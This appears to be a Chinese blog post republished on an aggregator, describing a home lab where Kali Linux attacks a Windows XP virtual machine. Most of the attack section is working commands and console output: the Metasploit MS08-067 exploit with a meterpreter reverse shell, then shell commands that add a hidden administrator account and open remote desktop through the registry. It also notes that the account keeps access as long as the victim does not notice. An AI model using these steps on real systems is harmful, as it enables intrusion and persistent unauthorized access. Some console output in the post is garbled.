kali入侵windows
因為我是一個愛好和平的人(捂嘴笑),所以就在虛擬機中,創(chuàng)建二個系統(tǒng),一個kali,一個windows xp,來進行這次入侵實驗,以此邁入hacke的大門。
####實驗環(huán)境 
####試驗工具 kaili linux 百度百科 其預(yù)裝了許多試驗工具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用戶可通過硬盤、live CD或live USB運行Kali Linux。
Metasploit 百度百科 Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具。
###知識點綜述 1.0 熟悉虛擬機vmware的相關(guān)知識,因為本環(huán)境是在VM中進行的,需要安裝kaili linux和windows xp,以及設(shè)計虛擬機網(wǎng)絡(luò),其可以參考文章:[vmware14.0知識點手冊](http://www.jianshu.com/p/91c409b8ce79). 2.0 計算機網(wǎng)絡(luò)相關(guān)知識點。 **2.1 vmware的虛擬網(wǎng)絡(luò)** >與物理交換機相似,虛擬交換機也能將網(wǎng)絡(luò)連接組件連接在一起。虛擬交換機又稱為虛擬網(wǎng)絡(luò),其名稱為VMnet0、VMnet1、VMnet2,以此類推。有少量虛擬交換機會默認映射到特定網(wǎng)絡(luò)。
橋接模式網(wǎng)絡(luò)連接 橋接模式網(wǎng)絡(luò)連接通過使用主機系統(tǒng)上的網(wǎng)絡(luò)適配器將虛擬機連接到網(wǎng)絡(luò)
NAT 模式網(wǎng)絡(luò)連接 使用 NAT 模式網(wǎng)絡(luò)時,虛擬機在外部網(wǎng)絡(luò)中不必具有自己的 IP 地址。主機系統(tǒng)上會建立單獨的專用網(wǎng)絡(luò)。
僅主機模式網(wǎng)絡(luò)連接 僅主機模式網(wǎng)絡(luò)連接可創(chuàng)建完全包含在主機中的網(wǎng)絡(luò)。
2.2 IP(這里是ipv4)地址分類,網(wǎng)絡(luò)類型。ip地址,由《net-id,host-id》二部分組成。根據(jù)網(wǎng)絡(luò)號的位數(shù),把ip劃分為A,B,C,D,E幾大類,其中A類(0,127),B類(128,191),C類(192,223)
3.0 VMWare虛擬機提供的橋接、nat和主機模式的區(qū)別
所以本次試驗的虛擬機網(wǎng)絡(luò)采用橋接方式,所以主要介紹下橋接。
bridged(橋接模式) 在這種模式下,VMWare虛擬出來的操作系統(tǒng)就像是局域網(wǎng)中的一臺獨立的主機,它可以訪問網(wǎng)內(nèi)任何一臺機器。 在橋接模式下,因為是獨立的主機系統(tǒng),那么就需要為虛擬系統(tǒng)配置IP、子網(wǎng)掩碼。 使用橋接模式的虛擬系統(tǒng)和宿主機器的關(guān)系,就像連接在同一個Hub上的兩臺電腦。想讓它們相互通訊,你就需要為虛擬系統(tǒng)配置IP地址和子網(wǎng)掩碼,否則就無法通信。而且還要和宿主機器處于同一網(wǎng)段,這樣虛擬系統(tǒng)才能和宿主機器進行通信。
###重要細節(jié) 1.0 **因為在vmware模擬kaili入侵windows xp所以要保證這二臺虛擬機可以通信,試驗的vmware采用橋接網(wǎng)絡(luò),二臺虛擬機相當(dāng)于獨立的主機,在vmware想要通信,必須處于同一網(wǎng)段(就是網(wǎng)絡(luò)號要一樣),二臺主機設(shè)置kaili設(shè)置為192.168.201.133,windows xp設(shè)置為192.168.201.135,它們是C類ip,前3位是網(wǎng)絡(luò)號,都是192.168.201相同,可以通信,可以采用ping命令進行。** 2.0 **為了試驗效果明顯,最好關(guān)閉掉windows的防火墻,這樣入侵更容易,而且自己原本的主機把殺毒軟件也關(guān)閉了。**
###入侵開始 **1.0 查看linux的ip地址** ``` root@kali:~# ifconfig eth0: flags=4163 mtu 1500 inet 192.168.201.133 netmask 255.255.255.0 broadcast 192.168.201.255 inet6 fe80::20c:29ff:fecc:87cf prefixlen 64 scopeid 0x20 ether 00:0c:29:cc:87:cf txqueuelen 1000 (Ethernet) RX packets 30 bytes 2530 (2.4 KiB) RX errors 0 dropped 5 overruns 0 frame 0 TX packets 51 bytes 3303 (3.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 52 bytes 3756 (3.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 52 bytes 3756 (3.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
>**這里可以看出我的ip地址為192.168.201.133。如果想要修改ip地址可以采用 ifconfig eth0 192.168.201.136 命令**<br> **其中127.0.0.1 127.0.0.1是[回送地址](https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80),指本地機,一般用來測試使用。回送地址(127.x.x.x)是本機回送地址(Loopback Address),即[主機](https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA)IP[堆棧](https://baike.baidu.com/item/%E5%A0%86%E6%A0%88)內(nèi)部的IP地址,主要用于網(wǎng)絡(luò)軟件測試以及本地機[進程間通信](https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1),無論什么程序,一旦使用回送地址發(fā)送數(shù)據(jù),協(xié)議軟件立即返回,不進行任何網(wǎng)絡(luò)傳輸。****2.0 ping命令,測試linux和windows是否可以通信** 復(fù)制代碼root@kali:~# ping -c 2 192.168.201.135 PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data. 64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms 64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms
--- 192.168.201.135 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1002ms rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms
**linux的ping和windows有所不同,如果不設(shè)置次數(shù)會一直ping下**去。 復(fù)制代碼root@kali:~# ping Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface] [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos] [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option] [-w deadline] [-W timeout] [hop1 ...] destination
**3.0 開啟SQL數(shù)據(jù)庫服務(wù)** 復(fù)制代碼root@kali:~# service postgresql start
**4.0 終端執(zhí)行msfconsole 命令** 復(fù)制代碼root@kali:~# msfconsole
cowsay++
< metasploit >
\ ,__,\ (oo)____(__) )\||--|| *=[ metasploit v4.16.6-dev ] 復(fù)制代碼- -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
- -- --=[ 498 payloads - 40 encoders - 10 nops ]
- -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > help
Core Commands
Command Description ------- ----------- ? Help menu banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console get Gets the value of a context-specific variable getg Gets the value of a global variable grep Grep the output of another command help Help menu history Show command history irb Drop into irb scripting mode load Load a framework plugin quit Exit the console route Route traffic through a session save Saves the active datastores sessions Dump session listings and display information about sessions set Sets a context-specific variable to a value setg Sets a global variable to a value sleep Do nothing for the specified number of seconds spool Write console output into a file as well the screen threads View and manipulate background threads unload Unload a framework plugin unset Unsets one or more context-specific variables unsetg Unsets one or more global variables version Show the framework and console library version numbers 復(fù)制代碼Module Commands
Command Description ------- ----------- advanced Displays advanced options for one or more modules back Move back from the current context edit Edit the current module with the preferred editor info Displays information about one or more modules loadpath Searches for and loads modules from a path options Displays global options or for one or more modules popm Pops the latest module off the stack and makes it active previous Sets the previously loaded module as the current module pushm Pushes the active or list of modules onto the module stack reload_all Reloads all modules from all defined module paths search Searches module names and descriptions show Displays modules of a given type, or all modules use Selects a module by name 復(fù)制代碼Job Commands
Command Description ------- ----------- handler Start a payload handler as job jobs Displays and manages jobs kill Kill a job rename_job Rename a job 復(fù)制代碼Resource Script Commands
Command Description ------- ----------- makerc Save commands entered since start to a file resource Run the commands stored in a file 復(fù)制代碼Database Backend Commands
Command Description ------- ----------- db_connect Connect to an existing database db_disconnect Disconnect from the current database instance db_export Export a file containing the contents of the database db_import Import a scan result file (filetype will be auto-detected) db_nmap Executes nmap and records the output automatically db_rebuild_cache Rebuilds the database-stored module cache db_status Show the current database status hosts List all hosts in the database loot List all loot in the database notes List all notes in the database services List all services in the database vulns List all vulnerabilities in the database workspace Switch between database workspaces 復(fù)制代碼Credentials Backend Commands
Command Description ------- ----------- creds List all credentials in the database 復(fù)制代碼 **5.0 運行search netapi命令搜索netapi,在metasploip框架中列出所有與netapi相關(guān)的漏洞利用代碼** 復(fù)制代碼msf > search netapi
Matching Modules
Name Disclosure Date Rank Description
exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
>**可以看到最后一個漏洞利用代碼的評級為great,所以優(yōu)先使用ms08_067_netapi。** **show tagrgets可以查看攻擊平臺** **show opinions可以查看攻擊需要設(shè)置那些參數(shù)** **show payloads可以查看使用的攻擊載荷****6.0使用 use exploit/windows/smb/ms08_067_netapi ,設(shè)置參數(shù)** 復(fù)制代碼msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.201.135 rhost => 192.168.201.135 msf exploit(ms08_067_netapi) > check [+] 192.168.201.135:445 The target is vulnerable. msf exploit(ms08_067_netapi) > set lhost 192.168.201.133 lhost => 192.168.201.133 msf exploit(ms08_067_netapi) > set target 34 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit [] Started reverse TCP handler on 192.168.201.133:1 [] 192.168.201.135:445 - Attempting to trigger the vulnerability... [] Sending stage (179267 bytes) to 192.168.201.135 [] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800
>**set rhost是設(shè)置目標(biāo)主機ip** **setset lhost設(shè)置本機ip** **set payload設(shè)置攻擊載荷** **exploit,是實行攻擊,如果成功,會得到一個session,可以使用meterpreter模板進一步提取****7.0 輸入shell,獲取受控zhuji的shel,我這里是windows的dos。** 復(fù)制代碼meterpreter > shell Process 1968 created. Channel 1 created. Microsoft Windows XP [錕芥本 5.1.2600] (C) 錕斤拷權(quán)錕斤拷錕斤拷 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user ztg 123456 /add net user ztg 123456 /add 錕絞伙拷錕窖撅拷錕斤拷錕節(jié)★拷
錕斤拷錕斤拷錕斤拷 NET HELPMSG 2224 錕皆伙拷錕矯革拷錕斤拷錕僥幫拷錕斤拷錕斤拷
C:\WINDOWS\system32>net localgroup administrators ztg /add net localgroup administrators ztg /add 錕斤拷錕斤拷系統(tǒng)錕斤拷錕斤拷 1378錕斤拷
錕斤拷錕斤拷錕絞伙拷錕斤拷錕斤拷錕角憋拷錕斤拷錕斤拷錕僥籌拷員錕斤拷
C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
錕斤拷錕斤拷錕繳癸拷錕斤拷錕斤拷
C:\WINDOWS\system32>netstat -an netstat -an
Active Connections
Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING TCP 192.168.201.135:139 0.0.0.0:0 LISTENING TCP 192.168.201.135:1031 192.168.201.133:1 ESTABLISHED UDP 0.0.0.0:445 :
UDP 0.0.0.0:500 :
UDP 0.0.0.0:4500 :
UDP 127.0.0.1:123 :
UDP 127.0.0.1:1025 :
UDP 127.0.0.1:1900 :
UDP 192.168.201.135:123 :
UDP 192.168.201.135:137 :
UDP 192.168.201.135:138 :
UDP 192.168.201.135:1900 :
C:\WINDOWS\system32>ipconfig -all ipconfig -all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dflxPrimary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : UnknownIP Routing Enabled. . . . . . . . : NoWINS Proxy Enabled. . . . . . . . : No 復(fù)制代碼Ethernet adapter 錕斤拷錕斤拷錕斤拷錕斤拷:
Connection-specific DNS Suffix . : Description . . . . . . . . . . . : VMware Accelerated AMD PCNet AdapterPhysical Address. . . . . . . . . : 00-0C-29-04-23-53Dhcp Enabled. . . . . . . . . . . : NoIP Address. . . . . . . . . . . . : 192.168.201.135Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 復(fù)制代碼 >**進入windows界面,dos大神可以暢通無阻了,不過如果喜歡windows界面,可以安裝上面的方法,進行操作,在遠程桌面。** ```C:\WINDOWS\system32>net user ztg 123456 /add net user ztg 123456 /add 復(fù)制代碼添加一個用戶名為ztg,密碼123456
C:\WINDOWS\system32>net localgroup administrators ztg /add net localgroup administrators ztg /add 復(fù)制代碼把ztg添加到管理員用戶組
C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 復(fù)制代碼是手動開啟3389(遠程桌面連接端口)
>#####在利用遠程桌面,登陸別人的電腦,進行相關(guān)的操作了。告訴你一個小細節(jié),在目標(biāo)機中會出現(xiàn)你建立的管理員賬號喔,可以多少遠程登錄了,只要對方?jīng)]有發(fā)現(xiàn)。 **有沒有人來黑我一下啊(捂嘴笑)。我的ip:127.0.0.1,系統(tǒng)是windows 10 64位家庭版。** >哎,這幾天沒有跑步,今天早上終于跑了,感冒了一整個十月,現(xiàn)在還在感冒中,哭死,哭死。
總結(jié)
以上是生活随笔為你收集整理的kali入侵windows的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Spring Boot(四):利用dev
- 下一篇: BeeHive模块注册